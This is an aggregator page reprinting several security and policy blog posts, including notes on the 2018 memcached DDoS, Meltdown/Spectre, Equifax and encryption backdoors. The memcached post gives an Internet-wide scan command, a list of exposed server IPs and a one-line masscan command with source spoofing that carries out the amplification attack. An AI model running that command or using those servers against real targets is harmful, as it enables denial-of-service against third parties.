ErrataRob.webp 2018-03-08 06:57:20 Some notes on memcached DDoS (lien direct) I thought I'd write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.Test your serversI added code to my port scanner for this, then scanned the Internet:masscan 0.0.0.0/0 -pU:11211 --banners | grep memcachedThis example scans the entire Internet (/0). Replaced 0.0.0.0/0 with your address range (or ranges).This produces output that looks like this:Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13Banner on port 11211/udp on 89.110.149.218: [memcached] uptime=3935192 time=1520485363 version=1.4.17Banner on port 11211/udp on 172.246.132.226: [memcached] uptime=230130 time=1520485357 version=1.4.13Banner on port 11211/udp on 84.200.45.2: [memcached] uptime=399858 time=1520485362 version=1.4.20Banner on port 11211/udp on 5.1.66.2: [memcached] uptime=29429482 time=1520485363 version=1.4.20Banner on port 11211/udp on 103.248.253.112: [memcached] uptime=2879363 time=1520485366 version=1.2.6Banner on port 11211/udp on 193.240.236.171: [memcached] uptime=42083736 time=1520485365 version=1.4.13The "banners" check filters out those with valid memcached responses, so you don't get other stuff that isn't memcached. To filter this output further, use  the 'cut' to grab just column 6:... | cut -d ' ' -f 6 | cut -d: -f1You often get multiple responses to just one query, so you'll want to sort/uniq the list:... | sort | uniqMy results from an Internet wide scanI got 15181 results (or roughly 15,000).People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.Masscan as exploit scriptBTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.masscan -iL amplifiers.txt -pU:11211 --spoof-ip --rate 100000I point this out to show how there's no magic in exploiting this. Numerous exploit scripts have been released, because it's so easy.Why memcached servers are vulnerableLike many servers, memcached listens to local IP address 127.0.0.1 for local administration. By listening only on the local IP address, remote people cannot talk to the server. Guideline
ErrataRob.webp 2018-02-02 21:32:16 Blame privacy activists for the Memo?? (lien direct) Former FBI agent Asha Rangappa @AshaRangappa_ has a smart post debunking the Nunes Memo, then takes it all back again with an op-ed on the NYTimes blaming us privacy activists. She presents an obviously false narrative that the FBI and FISA courts are above suspicion.I know from first hand experience the FBI is corrupt. In 2007, they threatened me, trying to get me to cancel a talk that revealed security vulnerabilities in a large corporation's product. Such abuses occur because there is no transparency and oversight. FBI agents write down our conversation in their little notebooks instead of recording it, so that they can control the narrative of what happened, presenting their version of the converstion (leaving out the threats). In this day and age of recording devices, this is indefensible.She writes "I know firsthand that it's difficult to get a FISA warrant". Yes, the process was difficult for her, an underling, to get a FISA warrant. The process is different when a leader tries to do the same thing.I know this first hand having casually worked as an outsider with intelligence agencies. I saw two processes in place: one for the flunkies, and one for those above the system. The flunkies constantly complained about how there is too many process in place oppressing them, preventing them from getting their jobs done. The leaders understood the system and how to sidestep those processes.That's not to say the Nunes Memo has merit, but it does point out that privacy advocates have a point in wanting more oversight and transparency in such surveillance of American citizens.Blaming us privacy advocates isn't the way to go. It's not going to succeed in tarnishing us, but will push us more into Trump's camp, causing us to reiterate that we believe the FBI and FISA are corrupt. Guideline
ErrataRob.webp 2018-01-04 02:29:18 Some notes on Meltdown/Spectre (lien direct) I thought I'd write up some notes.You don't have to worry if you patch. If you download the latest update from Microsoft, Apple, or Linux, then the problem is fixed for you and you don't have to worry. If you aren't up to date, then there's a lot of other nasties out there you should probably also be worrying about. I mention this because while this bug is big in the news, it's probably not news the average consumer needs to concern themselves with.This will force a redesign of CPUs and operating systems. While not a big news item for consumers, it's huge in the geek world. We'll need to redesign operating systems and how CPUs are made.Don't worry about the performance hit. Some, especially avid gamers, are concerned about the claims of "30%" performance reduction when applying the patch. That's only in some rare cases, so you shouldn't worry too much about it. As far as I can tell, 3D games aren't likely to see less than 1% performance degradation. If you imagine your game is suddenly slower after the patch, then something else broke it.This wasn't foreseeable. A common cliche is that such bugs happen because people don't take security seriously, or that they are taking "shortcuts". That's not the case here. Speculative execution and timing issues with caches are inherent issues with CPU hardware. "Fixing" this would make CPUs run ten times slower. Thus, while we can tweek hardware going forward, the larger change will be in software.There's no good way to disclose this. The cybersecurity industry has a process for coordinating the release of such bugs, which appears to have broken down. In truth, it didn't. Once Linus announced a security patch that would degrade performance of the Linux kernel, we knew the coming bug was going to be Big. Looking at the Linux patch, tracking backwards to the bug was only a matter of time. Hence, the release of this information was a bit sooner than some wanted. This is to be expected, and is nothing to be upset about.It helps to have a name. Many are offended by the crassness of naming vulnerabilities and giving them logos. On the other hand, we are going to be talking about these bugs for the next decade. Having a recognizable name, rather than a hard-to-remember number, is useful.Should I stop buying Intel? Intel has the worst of the bugs here. On the other hand, ARM and AMD alternatives have their own problems. Many want to deploy ARM servers in their data centers, but these are likely to expose bugs you don't see on x86 servers. The software fix, "page table isolation", seems to work, so there might not be anything to worry about. On the other hand, holding up purchases because of "fear" of this bug is a good way to squeeze price reductions out of your vendor. Conversely, later generation CPUs, "Haswell" and even "Skylake" seem to have the least performance degradation, so it might be time to upgrade older servers to newer processors.Intel misleads. Intel has a press release that implies they are not impacted any worse than others. This is wrong: the "Meltdown" issue appears to apply only to Intel CPUs. I don't like such marketing crap, so I mention it.
Statements from companies:Amazon AWSARMAMDIntelAnders Fogh's negative result
Guideline
ErrataRob.webp 2017-11-17 17:55:29 How to read newspapers (lien direct) News articles don't contain the information you think. Instead, they are written according to a formula, and that formula is as much about distorting/hiding information as it is about revealing it.A good example is the following. I claimed hate-crimes aren't increasing. The tweet below tries to disprove me, by citing a news article that claims the opposite:Ugh turns out you're wrong! I know you let quality data inform your opinions, and hope the FBI is a sufficiently credible source for you https://t.co/SVwaLilF9B- Rune Sørensen (@runesoerensen) November 14, 2017But the data behind this article tells a very different story than the words.Every November, the FBI releases its hate-crime statistics for the previous year. They've been doing this every year for a long time. When they do so, various news organizations grab the data and write a quick story around it.By "story" I mean a story. Raw numbers don't interest people, so the writer instead has to wrap it in a narrative that does interest people. That's what the writer has done in the above story, leading with the fact that hate crimes have increased.But is this increase meaningful? What do the numbers actually say?To answer this, I went to the FBI's website, the source of this data, and grabbed the numbers for the last 20 years, and graphed them in Excel, producing the following graph:As you can see, there is no significant rise in hate-crimes. Indeed, the latest numbers are about 20% below the average for the last two decades, despite a tiny increase in the last couple years. Statistically/scientifically, there is no change, but you'll never read that in a news article, because it's boring and readers won't pay attention. You'll only get a "news story" that weaves a narrative that interests the reader.So back to the original tweet exchange. The person used the news story to disprove my claim, but going to the underlying data, it only supports my claim that the hate-crimes are going down, not up -- the small increases of the past couple years are insignificant to the larger decreases of the last two decades.So that's the point of this post: news stories are deceptive. You have to double-check the data they are based upon, and pay less attention to the narrative they weave, and even less attention to the title designed to grab your attention.Anyway, as a side-note, I'd like to apologize for being human. The snark/sarcasm of the tweet above gives me extra pleasure in proving them wrong :). Guideline
ErrataRob.webp 2017-10-11 15:09:52 "Responsible encryption" fallacies (lien direct) Deputy Attorney General Rod Rosenstein gave a speech recently calling for "Responsible Encryption" (aka. "Crypto Backdoors"). It's full of dangerous ideas that need to be debunked.The importance of law enforcementThe first third of the speech talks about the importance of law enforcement, as if it's the only thing standing between us and chaos. It cites the 2016 Mirai attacks as an example of the chaos that will only get worse without stricter law enforcement.But the Mira case demonstrated the opposite, how law enforcement is not needed. They made no arrests in the case. A year later, they still haven't a clue who did it.Conversely, we technologists have fixed the major infrastructure issues. Specifically, those affected by the DNS outage have moved to multiple DNS providers, including a high-capacity DNS provider like Google and Amazon who can handle such large attacks easily.In other words, we the people fixed the major Mirai problem, and law-enforcement didn't.Moreover, instead being a solution to cyber threats, law enforcement has become a threat itself. The DNC didn't have the FBI investigate the attacks from Russia likely because they didn't want the FBI reading all their files, finding wrongdoing by the DNC. It's not that they did anything actually wrong, but it's more like that famous quote from Richelieu "Give me six words written by the most honest of men and I'll find something to hang him by". Give all your internal emails over to the FBI and I'm certain they'll find something to hang you by, if they want.Or consider the case of Andrew Auernheimer. He found AT&T's website made public user accounts of the first iPad, so he copied some down and posted them to a news site. AT&T had denied the problem, so making the problem public was the only want to force them to fix it. Such access to the website was legal, because AT&T had made the data public. However, prosecutors disagreed. In order to protect the powerful, they twisted and perverted the law to put Auernheimer in jail.It's not that law enforcement is bad, it's that it's not the unalloyed good Rosenstein imagines. When law enforcement becomes the thing Rosenstein describes, it means we live in a police state.Where law enforcement can't goRosenstein repeats the frequent claim in the encryption debate:Our society has never had a system where evidence of criminal wrongdoing was totally impervious to detectionOf course our society has places "impervious to detection", protected by both legal and natural barriers.An example of a legal barrier is how spouses can't be forced to testify against each other. This barrier is impervious.A better example, though, is how so much of government, intelligence, the military, and law enforcement itself is impervious. If prosecutors could gather evidence everywhere, then why isn't Rosenstein prosecuting those guilty of CIA torture?Oh, you say, government is a special exception. If that were the case, then why did Rosenstein dedicate a precious third of his speech discussing the "rule of law" and how it applies to everyone, "protecting people from abuse by the government". It obviously doesn't, there's one rule of government and a different rule for the people, and the rule for government means there's lots of places law enforcement can't go to gather evidence.Likewise, the crypto backdoor Rosenstein is demanding for citizens doesn't apply to the President, Congress, the NSA, the Army, or Rosenstein himself.Then there are the natural barriers. The police can't read your mind. They can only get the evidence that is there, like partial fingerprints, which are far less reliable than full fingerpri Guideline
ErrataRob.webp 2017-09-16 18:39:05 People can\'t read (Equifax edition) (lien direct) One of these days I'm going to write a guide for journalists reporting on the cyber. One of the items I'd stress is that they often fail to read the text of what is being said, but instead read some sort of subtext that wasn't explicitly said. This is valid sometimes -- as the subtext is what the writer intended all along, even if they didn't explicitly write it. Other times, though the imagined subtext is not what the writer intended at all.A good example is the recent Equifax breach. The original statement says:Equifax Inc. (NYSE: EFX) today announced a cybersecurity incident potentially impacting approximately 143 million U.S. consumers.The word consumers was widely translated to customers, as in this Bloomberg story:Equifax Inc. said its systems were struck by a cyberattack that may have affected about 143 million U.S. customers of the credit reporting agencyBut these aren't the same thing. Equifax is a credit rating agency, keeping data on people who are not its own customers. It's an important difference.Another good example is yesterday's quote "confirming" that the "Apache Struts" vulnerability was to blame:Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638.But it doesn't confirm Struts was responsible. Blaming Struts is certainly the subtext of this paragraph, but it's not the text. It mentions that criminals had exploited the Struts vulnerability, but don't actually connect the dots to the breach we are all talking about.There's probably reasons for this. While it's easy for forensics to find evidence of Struts exploitation in logfiles, it's much harder to connect this to the breach. While they suspect Struts, they may not actually be able to confirm it. Or, maybe they are trying to cover things up, where they feel failing to patch is a lesser crime than what they really did.It's at this point journalists should earn their pay. Instead rewriting what they read on the Internet, they could do legwork and call up Equifax PR and ask.The purpose of this post isn't to discuss Equifax, but the tendency of people to "read between the lines", to read some subtext that wasn't actually expressed in the text. Sometimes the subtext is legitimately there, such as how Equifax clearly intends people to blame Struts thought they don't say it outright. Sometimes the subtext isn't there, such as how Equifax doesn't mean it's own customers, only "U.S. consumers". Journalists need to be careful about making assumptions about the subtext.
Update: The Equifax CSO has a degree in music. Some people have criticized this. Most people have defended this, pointing out that almost nobody has an "infosec" degree in our industry, and many of the top people have no degree at all. Among others, @thegrugq has pointed out that infosec degrees are only a few years old -- they weren't around 20 years ago when today's corporate officers were getting their degrees.Again, we have the text/subtext problem, where people interpret infosec degrees as being the same as computer-science degrees, the later of which have existed for decades. Some, as in this case, consider them to be wildly different. Others consider them to be nearly the same.
Guideline Equifax
ErrataRob.webp 2017-08-22 22:48:09 ROI is not a cybersecurity concept (lien direct) In the cybersecurity community, much time is spent trying to speak the language of business, in order to communicate to business leaders our problems. One way we do this is trying to adapt the concept of "return on investment" or "ROI" to explain why they need to spend more money. Stop doing this. It's nonsense. ROI is a concept pushed by vendors in order to justify why you should pay money for their snake oil security products. Don't play the vendor's game.The correct concept is simply "risk analysis". Here's how it works.List out all the risks. For each risk, calculate:How often it occurs.How much damage it does.How to mitigate it.How effective the mitigation is (reduces chance and/or cost).How much the mitigation costs.If you have risk of something that'll happen once-per-day on average, costing $1000 each time, then a mitigation costing $500/day that reduces likelihood to once-per-week is a clear win for investment.Now, ROI should in theory fit directly into this model. If you are paying $500/day to reduce that risk, I could use ROI to show you hypothetical products that will ......reduce the remaining risk to once-per-month for an additional $10/day....replace that $500/day mitigation with a $400/day mitigation.But this is never done. Companies don't have a sophisticated enough risk matrix in order to plug in some ROI numbers to reduce cost/risk. Instead, ROI is a calculation is done standalone by a vendor pimping product, or a security engineer building empires within the company.If you haven't done risk analysis to begin with (and almost none of you have), then ROI calculations are pointless.But there are further problems. This is risk analysis as done in industries like oil and gas, which have inanimate risk. Almost all their risks are due to accidental failures, like in the Deep Water Horizon incident. In our industry, cybersecurity, risks are animate -- by hackers. Our risk models are based on trying to guess what hackers might do.An example of this problem is when our drug company jacks up the price of an HIV drug, Anonymous hackers will break in and dump all our financial data, and our CFO will go to jail. A lot of our risks come now from the technical side, but the whims and fads of the hacker community.Another example is when some Google researcher finds a vuln in WordPress, and our website gets hacked by that three months from now. We have to forecast not only what hackers can do now, but what they might be able to do in the future.Finally, there is this problem with cybersecurity that we really can't distinguish between pesky and existential threats. Take ransomware. A lot of large organizations have just gotten accustomed to just wiping a few worker's machines every day and restoring from backups. It's a small, pesky problem of little consequence. Then one day a ransomware gets domain admin privileges and takes down the entire business for several weeks, as happened after #nPetya. Inevitably our risk models always come down on the high side of estimates, with us claiming that all threats are existential, when in fact, most companies continue to survive major breaches.These difficulties with risk analysis leads us to punting on the problem altogether, but that's not the right answer. No matter how faulty our risk analysis is, we still have to go through the exercise.One model of how to do this calculation is architecture. We know we need a certain number of toilets per building, even without doing ROI on the value of such toilets. The same is true for a lot of security engineering. We know we need firewalls, encryption, and OWASP hardening, even without specifically doing a calculation. Passwords and session cookies need to go across SSL. That's the starting point from which we start to analysis risks and mitigations -- what we need b Guideline
Last update at: 2024-05-02 21:07:55
See our sources.
My email:

To see everything: Our RSS (filtrered) Twitter